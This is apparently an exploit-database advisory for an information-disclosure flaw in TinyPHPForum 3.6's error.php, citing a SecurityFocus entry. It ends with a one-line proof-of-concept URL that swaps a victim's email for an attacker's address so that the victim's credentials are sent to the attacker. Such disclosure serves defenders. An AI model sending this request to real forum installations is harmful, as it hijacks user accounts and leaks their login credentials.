[] NeoSense

TinyPHPForum 3.6 - 'error.php' Information Disclosure

Author: SirDarckCat
type: webapps
platform: php
port: 
date_added: 2006-08-01 
date_updated: 2016-12-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/19278/info

TinyPHPForum is prone to an information-disclosure vulnerability. This issue arises when a script allows a remote untrusted source to change a victim user's email address, and have their login credentials returned to an attacker.

Information that the attacker gathers by exploiting this vulnerability may aid in other attacks.

http://www.example.com/error.php?err=200&uname=victim&email=attacker@example.com